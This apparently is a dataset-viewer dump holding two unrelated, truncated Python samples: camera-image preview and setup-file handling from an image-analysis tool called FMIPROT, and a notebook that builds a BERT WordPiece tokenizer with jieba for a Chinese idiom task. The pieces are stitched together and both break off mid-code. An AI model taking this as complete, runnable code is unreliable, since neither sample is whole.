input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
= (int(self.SensVariable.get()*25*self.UnitSize*(self.PictureImage.size[0]/float(self.PictureImage.size[1]))),self.SensVariable.get()*25*self.UnitSize)
self.PictureRatio = (self.SensVariable.get()*25*self.UnitSize)/float(self.PictureImage.size[1])
self.PictureImage = self.PictureImage.resize(self.PictureSize,Image.ANTIALIAS)
self.PicturePhoto = ImageTk.PhotoImage(self.PictureImage)
self.PictureCanvas.delete("all")
self.PictureCanvas.create_image(0,0,image=self.PicturePhoto,anchor="nw")
if self.ActiveMenu.get() == "Polygonic Masking" or "Choose Picture " == self.ActiveMenu.get():
coords = self.setup[self.AnalysisNoVariable.get()-1]['polygonicmask']
if isinstance(coords,dict):
coordss = []
for k in range(len(coords)):
coordss.append(coords[str(k)])
coords = coordss
if not isinstance(coords[0],list):
coords_ = [coords[:]]
else:
coords_ = coords[:]
for coords in coords_:
tmp = coords[:]
for i,t in enumerate(tmp):
if i % 2 == 0:
tmp[i] = round(t*self.PictureImage.size[0]) #maskdebug
else:
tmp[i] = round(t*self.PictureImage.size[1])
if tmp != [0,0,0,0,0,0,0,0]:
self.PictureCanvas.create_polygon(*(tmp),outline=[self.PolygonColor0.get(),self.PolygonColor1.get()][int(float(self.PolygonNoVariable.get()-1!=coords_.index(coords)))],fill="",width=self.PolygonWidth.get())
else:
try:
self.PictureCanvas.destroy()
if not self.PlotCanvasSwitch.get():
self.geometry(str(self.WindowX)+"x"+str(self.WindowY))
except:
pass
def FetchCurrentImages(self):
self.DownloadArchive(camselect=False)
if "Choose Picture for Preview" == self.ActiveMenu.get():
self.Menu_Main_Camera_Picture()
if "Choose Picture " == self.ActiveMenu.get():
self.Menu_Main_Masking_Polygonic_Picture()
self.Message.set("Images fetched.")
def ChangePictureFileName(self,*args):
fn = self.MenuItem1.get(self.MenuItem1.curselection())
source_ = self.setup[self.AnalysisNoVariable.get()-1]['source']
source = sources.getProxySource(self.Message,source_,self.proxylist)
scenario = self.setup[self.AnalysisNoVariable.get()-1]
pfn_ts = '-' + parsers.dTime2fTime(parsers.strptime2(fn,source['filenameformat'])[0])
if 'temporary' in source and source['temporary']:
pfn = validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
pfn_prev = [validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']), os.path.splitext(source['filenameformat'])[1]]
else:
pfn = source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
pfn_prev = [source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']),os.path.splitext(source['filenameformat'])[1]]
if source['protocol'] == 'LOCAL':
self.PictureFileName.set(os.path.join(source['path'],fn))
else:
if 'temporary' in source and source['temporary']:
self.PictureFileName.set(os.path.join(os.path.join(TmpDir,'tmp_images'),validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']),fn))
else:
self.PictureFileName.set(os.path.join(self.imagespath.get(),source['networkid']+'-'+parsers.validateName(source['network']),parsers.validateName(source['name']),fn))
self.setup[self.AnalysisNoVariable.get()-1].update({'previewimagetime':parsers.strftime2(parsers.strptime2(fn,source['filenameformat'])[0])[0]})
self.Message.set("Preview image is changed.")
try:
shutil.copyfile(self.PictureFileName.get(),os.path.join(PreviewsDir,pfn))
self.Message.set('Preview image file is updated camera: '+source['network'] + ' - ' + source['name'])
except:
self.Message.set('Preview image file could not be updated for camera: '+source['network'] + ' - ' + source['name'] + '.')
self.UpdatePictures()
def UpdatePreviewPictureFilesAll(self):
if tkMessageBox.askyesno('Preview images','Preview images will be checked and downloaded. This process can take a long time depending on the number of cameras and networks. If needed, passwords and usernames will also be asked.\nDo you want to proceed?'):
for source in self.sourcelist:
self.UpdatePreviewPictureFiles(source,[],noconfirm=True)
def UpdatePreviewPictureFiles(self,source,scenario,noconfirm=False):
self.Message.set('Checking preview image for '+source['name']+'...')
pfn_ts = ''
if 'previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None:
pfn_ts = '-' + parsers.sTime2fTime(scenario['previewimagetime'])
else:
if 'previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None:
pfn_ts = '-' + parsers.sTime2fTime(source['previewimagetime'])
if 'temporary' in source and source['temporary']:
pfn = validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
else:
pfn = source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
if pfn in os.listdir(PreviewsDir):
return (source,scenario)
else:
if noconfirm or not sysargv['prompt'] or tkMessageBox.askyesno('Missing preview image','Preview image is missing for '+source['network']+' '+source['name']+'. Do you want to fetch one?'):
self.Message.set('Updating preview image for camera: '+source['network'] + ' - ' + source['name'])
img = []
if 'previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None:
self.Message.set('Looking for the image for the ' + source_metadata_names['previewimagetime'] + ' provided by the setup file....' )
timec = [0,0,0,0]
timec[0] = parsers.strftime2(parsers.strptime2(scenario['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[1]
timec[1] = parsers.strftime2(parsers.strptime2(scenario['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[1]
timec[2] = parsers.strftime2(parsers.strptime2(scenario['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[2]
timec[3] = parsers.strftime2(parsers.strptime2(scenario['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[2]
img, ts = fetchers.fetchImages(self, self.Message, source, self.proxy, self.connection, self.imagespath.get(), timec + ['Date and time intervals'], count=1, online=True, care_tz = self.TimeZoneConversion.get())[:2]
if len(img) == 0:
del scenario['previewimagetime']
self.Message.set('Can not find the image for the ' + source_metadata_names['previewimagetime'] + ' provided by the setup file. It is removed from the setup.' )
else:
if 'previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None:
self.Message.set('Looking for the image for the ' + source_metadata_names['previewimagetime'] + ' provided by CNIF....' )
timec = [0,0,0,0]
timec[0] = parsers.strftime2(parsers.strptime2(source['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[1]
timec[1] = parsers.strftime2(parsers.strptime2(source['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[1]
timec[2] = parsers.strftime2(parsers.strptime2(source['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[2]
timec[3] = parsers.strftime2(parsers.strptime2(source['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[2]
img, ts = fetchers.fetchImages(self, self.Message, source, self.proxy, self.connection, self.imagespath.get(), timec + ['Date and time intervals'], count=1, online=True, care_tz = self.TimeZoneConversion.get())[:2]
if len(img) == 0:
self.Message.set('Can not find the image for the ' + source_metadata_names['previewimagetime'] + ' provided by CNIF.' )
else:
self.Message.set(source_metadata_names['previewimagetime'] + ' is not supplied in CNIF file or the scenario.')
if len(img) == 0:
self.Message.set('Looking for a suitable image...')
img, ts = fetchers.fetchImages(self, self.Message, source, self.proxy, self.connection, self.imagespath.get(), [0,0,'11:30','12:30','Date and time intervals'], count=1, online=True, care_tz = self.TimeZoneConversion.get())[:2]
if len(img) == 0:
img, ts = fetchers.fetchImages(self, self.Message, source, self.proxy, self.connection, self.imagespath.get(), [0,0,'00:00','23:59','All'], count=1, online=True, care_tz = self.TimeZoneConversion.get())[:2]
if len(img) == 0:
self.Message.set('No suitable file for preview image found for camera: '+source['network'] + ' - ' + source['name'])
return (source,scenario)
else:
if ('previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None) or ('previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None):
if len(pfn_ts) == 0:
pfn = os.path.splitext(pfn)[0] + '-' + parsers.dTime2fTime(ts[0]) + os.path.splitext(pfn)[1]
else:
pfn = os.path.splitext(pfn)[0][:-len(pfn_ts)] + '-' + parsers.dTime2fTime(ts[0]) + os.path.splitext(pfn)[1]
else:
if len(pfn_ts) == 0:
pfn = os.path.splitext(pfn)[0] + os.path.splitext(pfn)[1]
else:
pfn = os.path.splitext(pfn)[0][:-len(pfn_ts)] + os.path.splitext(pfn)[1]
try:
shutil.copyfile(img[0],os.path.join(PreviewsDir,pfn))
self.Message.set('Preview image downloaded/updated for camera: '+source['network'] + ' - ' + source['name'])
self.PictureFileName.set(os.path.join(PreviewsDir,pfn))
except:
self.Message.set('Preview image could not be downloaded/updated for camera: '+source['network'] + ' - ' + source['name'])
return (source,scenario)
self.Message.set('Checking complete.')
def UpdatePictureFileName(self):
source_ = self.setup[self.AnalysisNoVariable.get()-1]['source']
source = sources.getProxySource(self.Message,source_,self.proxylist)
scenario = self.setup[self.AnalysisNoVariable.get()-1]
pfn_ts = ''
if 'previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None:
pfn_ts = '-' + parsers.sTime2fTime(scenario['previewimagetime'])
else:
if 'previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None:
pfn_ts = '-' + parsers.sTime2fTime(source['previewimagetime'])
if 'temporary' in source and source['temporary']:
pfn = validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
else:
pfn = source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
if pfn in os.listdir(PreviewsDir):
self.PictureFileName.set(os.path.join(PreviewsDir,pfn))
else:
self.PictureFileName.set(os.path.join(ResourcesDir,'preview_blank.jpg'))
def setupFileLoad(self):
if sysargv['setupfile'] is not None:
ans = sysargv['setupfile']
else:
self.file_opt = options = {}
options['defaultextension'] = '.cfg'
options['filetypes'] = [ ('FMIPROT setup files', '.cfg'),('FMIPROT configuration files', '.cfg'),('all files', '.*')]
options['title'] = 'Choose setup file to load...'
ans = tkFileDialog.askopenfilename(**self.file_opt)
if ans != '' and ans != '.' and ans != ():
ans = os.path.normpath(ans)
setup = self.setupFileRead(ans)
if sysargv['gui']:
self.Menu_Main()
self.setup = setup
(self.networklist,self.sourcelist, self.setup) = sources.fixSourcesBySetup(self.Message,self.networklist,self.sourcelist, self.setup)
self.setupFileVariable.set(ans)
self.Message.set("Setup file is loaded.")
if not sysargv['gui']:
return False
self.AnalysisNoVariable.set(1)
self.Menu_Main()
else:
self.Message.set("Loading cancelled.")
def setupFileRead(self,fname):
setup = parsers.readSetup(fname,self.sourcelist,self.Message)
#check analyses are valid:
warning = "Analyses "
showwarning = False
for s,scenario in enumerate(setup):
if not isinstance(scenario['analyses'],list):
scenario.update({'analyses':[scenario['analyses']]})
discard = []
for analysis in scenario['analyses']:
if analysis == '':
discard.append(analysis)
else:
if scenario[analysis]['id'] not in calcids:
discard.append(analysis)
showwarning = True
self.Message.set("Analysis "+ scenario[analysis]['name']+" in selected setup file is not supported anymore or plugin file is not detected if it is a plugin. The analysis is discarded.")
warning += analysis + ' in selected setup file are not supported anymore or plugin file(s) are not detected if it is a plugin. The analyses are discarded. '
else:
for p,param in enumerate(paramnames[calcids.index(scenario[analysis]['id'])]):
if param not in scenario[analysis]:
scenario[analysis].update({param:paramdefs[calcids.index(scenario[analysis]['id'])][p]})
self.Message.set("Analysis "+ scenario[analysis]['name']+" in selected setup file does not include the parameter "+ param+ ". It is set to default ("+str(paramdefs[calcids.index(scenario[analysis]['id'])][p])+").")
analyses = []
for analysis in scenario['analyses']:
if analysis not in discard:
analyses.append(analysis)
scenario.update({'analyses':analyses})
for analysis in discard:
if analysis != '':
del scenario[analysis]
if len(discard)>0:
if len(analyses) > 0:
for i,d in enumerate(discard):
d = int(discard[i].replace('analysis-',''))
scenario.update({'analysis-'+str(d-i):scenario['analysis-'+str(d+1)]})
else:
scenario.update({'analysis-1':deepcopy(scenario_def['analysis-1'])})
scenario.update({'analyses':['analysis-1']})
warning += 'It was the only analysis in the scenario, thus the default analysis is added to the scenario.'
warning += '\n'
setup[s] = scenario
if showwarning:
tkMessageBox.showwarning('Setup problem',warning)
#fix polygons
for i,scenario in enumerate(setup):
if isinstance(scenario['polygonicmask'],dict):
coordict = scenario['polygonicmask']
coordlist = []
for j in range(len(coordict)):
coordlist.append(coordict[str(j)])
setup[i].update({'polygonicmask':coordlist})
#fix missing multiplerois
for i,scenario in enumerate(setup):
if 'multiplerois' not in scenario:
setup[i].update({'multiplerois':0})
#fix temporal selection
for i,scenario in enumerate(setup):
if len(scenario['temporal']) < 5:
setup[i]['temporal'].append(temporal_modes[1])
#fix timestamps from v0.15.4 and older
for i,scenario in enumerate(setup):
for key in ['previewimagetime','lastimagetime','firstimagetime']:
if key in scenario and scenario[key] is not None:
if scenario[key] == '':
scenario[key] = None
else:
if 'T' not in scenario[key]:
setup[i][key] = parsers.strftime2(parsers.strptime2(scenario[key],'%Y%m%d_%H%M%S')[0])[0]
if key in scenario['source'] and scenario['source'][key] is not None:
if scenario['source'][key] == '':
scenario['source'][key] = None
else:
if 'T' not in scenario['source'][key]:
setup[i]['source'][key] = parsers.strftime2(parsers.strptime2(scenario['source'][key],'%Y%m%d_%H%M%S')[0])[0]
if 'timezone' in scenario['source'] and scenario['source']['timezone'] is not None:
if ':' not in scenario['source']['timezone']:
setup[i]['source']['timezone'] = scenario['source']['timezone'][:-2] + ':' + scenario['source']['timezone'][-2:]
#fix Thresholds
for i,scenario in enumerate(setup):
if len(scenario['thresholds']) == 18:
setup[i]['thresholds'] = scenario['thresholds'] + [0.0,1.0,0.0,1.0,0.0,1.0,0.0,1.0]
if len(scenario['thresholds']) == 8:
setup[i]['thresholds'] = scenario['thresholds'] + [0.0,255.0,0.0,255.0,0.0,255.0,0.0,1.0,0.0,255.0,0.0,1.0,0.0,1.0,0.0,1.0,0.0,1.0]
return setup
def setupFileSave(self):
self.UpdateSetup()
if self.setupFileVariable.get() == "Untitled.cfg":
self.setupFileSaveas()
else:
parsers.writeTSVx(self.setupFileVariable.get(),self.setupToWrite(self.setup))
self.Message.set("Setup file saved as " + os.path.split(self.setupFileVariable.get())[1])
def setupFileSaveas(self):
self.UpdateSetup()
self.file_opt = options = {}
options['defaultextension'] = '.cfg'
options['filetypes'] = [ ('FMIPROT setup files', '.cfg'),('FMIPROT configuration files', '.cfg'),('all files', '.*')]
options['title'] = 'Set setup file to save...'
ans = tkFileDialog.asksaveasfilename(**self.file_opt)
if ans != '' and ans != '.' and ans != ():
ans = os.path.normpath(ans)
self.setupFileVariable.set(ans)
parsers.writeTSVx(self.setupFileVariable.get(),self.setupToWrite(self.setup))
self.Message.set("Setup file saved as " + os.path.split(self.setupFileVariable.get())[1])
else:
self.Message.set("Saving cancelled.")
def setupFileSaveasModified(self):
self.UpdateSetup()
self.file_opt = options = {}
options['defaultextension'] = '.cfg'
options['filetypes'] = [ ('FMIPROT setup files', '.cfg'),('FMIPROT configuration files', '.cfg'),('all files', '.*')]
options['title'] = 'Set setup file to save...'
ans = tkFileDialog.asksaveasfilename(**self.file_opt)
if ans != '' and ans != '.' and ans != ():
ans = os.path.normpath(ans)
setup = deepcopy(self.setup)
setup = self.modifySourcesInSetup(setup)
parsers.writeTSVx(ans,self.setupToWrite(setup))
self.Message.set("Modified copy of setup file saved as " + os.path.split(ans)[1])
else:
self.Message.set("Saving cancelled.")
def setupToWrite(self,setup):
setup_ = deepcopy(setup)
setuptowrite = []
for i,scenario in enumerate(setup_):
if 'temporary' not in scenario:
setuptowrite.append(scenario)
else:
if scenario['temporary'] is False:
del scenario['temporary']
setuptowrite.append(scenario)
for i,scenario in enumerate(setuptowrite):
if isinstance(scenario['polygonicmask'][0],list):
coordlist = scenario['polygonicmask']
coordict = {}
for j, coord in enumerate(coordlist):
coordict.update({str(j):coord})
setuptowrite[i].update({'polygonicmask':coordict})
return setuptowrite
def setupFileClear(self):
self.setupFileVariable.set("Untitled.cfg")
self.setup = []
if not sysargv['gui']:
return False
self.AnalysisNoNew()
self.Menu_Main()
self.Message.set("Setup is resetted.")
def setupFileReport(self):
self.UpdateSetup()
self.file_opt = options = {}
options['defaultextension'] = '.html'
options['filetypes'] = [ ('HTML', '.html'),('all files', '.*')]
options['title'] = 'Set file to save the report...'
ans = tkFileDialog.asksaveasfilename(**self.file_opt)
if ans != '' and ans != '.' and ans != ():
ans = os.path.normpath(ans)
self.setupFileReportFunc(ans)
else:
self.Message.set('Report generation cancelled.')
def setupFileReportFunc(self,ans,s=False):
res_data = False
if isinstance(ans,list):
res_data = ans[1:]
ans = ans[0]
if ans != '' and ans != '.':
setup = deepcopy(self.setup)
maskdir = os.path.splitext(ans)[0]+"_files"
if s is not False:
setup = [deepcopy(self.setup[s])]
for i,scenario in enumerate(setup):
source_ = scenario['source']
source = sources.getProxySource(self.Message,source_,self.proxylist)
(source,scenario) = self.UpdatePreviewPictureFiles(source,scenario)
pfn_ts = ''
if 'previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None:
pfn_ts = '-' + parsers.sTime2fTime(scenario['previewimagetime'])
else:
if 'previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None:
pfn_ts = '-' + parsers.sTime2fTime(source['previewimagetime'])
if 'temporary' in source and source['temporary']:
pfn = validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path']) +'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
else:
pfn = source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
if not os.path.exists(maskdir):
os.makedirs(maskdir)
maskfiles = []
maskfilet = []
maskfilet.append(os.path.join(maskdir,"Scenario_"+str(i+1)+"_Mask_Preview_0.jpg"))
maskfilet.append(os.path.join(maskdir,"Scenario_"+str(i+1)+"_Mask_Preview_1.jpg"))
maskfilet.append(os.path.join(maskdir,"Scenario_"+str(i+1)+"_Mask_Preview_2.jpg"))
maskfilet.append(os.path.join(maskdir,"Scenario_"+str(i+1)+"_Mask_Preview_3.jpg"))
maskfiles.append(os.path.join(TmpDir,"Scenario_"+str(i+1)+"_Mask_Preview_0.jpg"))
maskfiles.append(os.path.join(TmpDir,"Scenario_"+str(i+1)+"_Mask_Preview_1.jpg"))
maskfiles.append(os.path.join(TmpDir,"Scenario_"+str(i+1)+"_Mask_Preview_2.jpg"))
maskfiles.append(os.path.join(TmpDir,"Scenario_"+str(i+1)+"_Mask_Preview_3.jpg"))
aoic = deepcopy(scenario['polygonicmask'])
if isinstance(aoic, dict):
aoi = []
for k in aoic:
aoi.append(aoic[k])
aoic = aoi
if not | |
!pip install ../kernel/my_jieba.zip
!unzip ../kernel/1568302514.zip
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import re
"""Tokenization classes."""
import collections
import unicodedata
import six
import tensorflow as tf
def convert_to_unicode(text):
"""Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text.decode("utf-8", "ignore")
elif isinstance(text, unicode):
return text
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def printable_text(text):
"""Returns text encoded in a way suitable for print or `tf.logging`."""
# These functions want `str` for both Python2 and Python3, but in one case
# it's a Unicode string and in the other it's a byte string.
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text
elif isinstance(text, unicode):
return text.encode("utf-8")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
index = 0
with tf.gfile.GFile(vocab_file, "r") as reader:
while True:
token = convert_to_unicode(reader.readline())
if not token:
break
token = token.strip()
vocab[token] = index
index += 1
return vocab
def convert_by_vocab(vocab, items):
"""Converts a sequence of [tokens|ids] using the vocab."""
output = []
for item in items:
if item.startswith("##") and item.split("##")[-1] in vocab:
if len(item.split("##")[-1]) == 1:
cp = ord(item.split("##")[-1])
if _is_chinese_char(cp):
output.append(vocab.get(item.split("##")[-1], vocab["[UNK]"]))
else:
output.append(vocab.get(item, vocab["[UNK]"]))
else:
output.append(vocab.get(item, vocab["[UNK]"]))
else:
output.append(vocab.get(item, vocab["[UNK]"]))
return output
def convert_tokens_to_ids(vocab, tokens):
return convert_by_vocab(vocab, tokens)
def convert_ids_to_tokens(inv_vocab, ids):
def convert_by_vocab(vocab, items):
"""Converts a sequence of [tokens|ids] using the vocab."""
output = []
for item in items:
output.append(vocab[item])
return output
return convert_by_vocab(inv_vocab, ids)
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
unused_token = {}
for i in range(1, 100):
unused_token['[unused{}]'.format(i)] = i
class FullTokenizer(object):
"""Runs end-to-end tokenziation."""
def __init__(self, vocab_file, do_lower_case=True, do_whole_word_mask=False):
self.vocab = load_vocab(vocab_file)
self.inv_vocab = {v: k for k, v in self.vocab.items()}
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case,
do_whole_word_mask=do_whole_word_mask)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
if token in unused_token:
split_tokens.append(token)
continue
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens, max_length=None):
return convert_tokens_to_ids(self.vocab, tokens)
def convert_ids_to_tokens(self, ids):
return convert_ids_to_tokens(self.inv_vocab, ids)
def covert_tokens_to_char_ids(self, tokens, max_length=None, char_len=5):
pass
def padding(self, token_id_lst, max_length, zero_padding=0):
return token_id_lst + [zero_padding] * (max_length - len(token_id_lst))
class BasicTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True, do_whole_word_mask=False):
"""Constructs a BasicTokenizer.
Args:
do_lower_case: Whether to lower case the input.
"""
self.do_lower_case = do_lower_case
self.do_whole_word_mask = do_whole_word_mask
def tokenize(self, text):
"""Tokenizes a piece of text."""
text = convert_to_unicode(text)
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
if not self.do_whole_word_mask:
text = self._tokenize_chinese_chars(text)
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case:
token = token.lower()
token = self._run_strip_accents(token)
if token in unused_token:
split_tokens.append(token)
continue
split_tokens.extend(self._run_split_on_punc(token))
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text):
"""Splits punctuation on a piece of text."""
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
if _is_punctuation(char):
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer(object):
"""Runs WordPiece tokenziation."""
def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
self.vocab = vocab
self.unk_token = unk_token
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
"""Tokenizes a piece of text into its word pieces.
This uses a greedy longest-match-first algorithm to perform tokenization
using the given vocabulary.
For example:
input = "unaffable"
output = ["un", "##aff", "##able"]
Args:
text: A single token or whitespace separated tokens. This should have
already been passed through `BasicTokenizer.
Returns:
A list of wordpiece tokens.
"""
text = convert_to_unicode(text)
output_tokens = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
output_tokens.append(self.unk_token)
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr
if substr in self.vocab:
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_bad:
output_tokens.append(self.unk_token)
else:
output_tokens.extend(sub_tokens)
return output_tokens
def _is_chinese_char(cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
tokenizer = FullTokenizer(
vocab_file='../kernel/vocab.txt',
do_lower_case=False,
do_whole_word_mask=False)
import jieba
for word in unused_token:
jieba.add_word(word)
print(tokenizer.tokenize(" ".join(jieba.cut('罗杰·加西亚和贝拉乌桑几乎[unused1]的情况下'))))
idiom_dict = {}
length = []
left = []
import json, codecs
with codecs.open('../kernel/idiomDict_clean.json', 'r', 'utf-8') as frobj:
for i, line in enumerate(frobj):
content = json.loads(line.strip())
if isinstance(content['info'], list):
idiom_dict[content['word']] = "。".join(content['info'])
else:
idiom_dict[content['word']] = content['info']
length.append(len(idiom_dict[content['word']]))
if len(idiom_dict[content['word']]) >= 64:
left.append(content['word'])
import jieba
import copy, json
import codecs
import re
answer_pattern = re.compile('#idiom\d+#')
postprocess_answer_pattern = re.compile('\[unused\d+\]')
from collections import namedtuple
max_length = 272
answer_length = 10
max_label = 5
input_lst = []
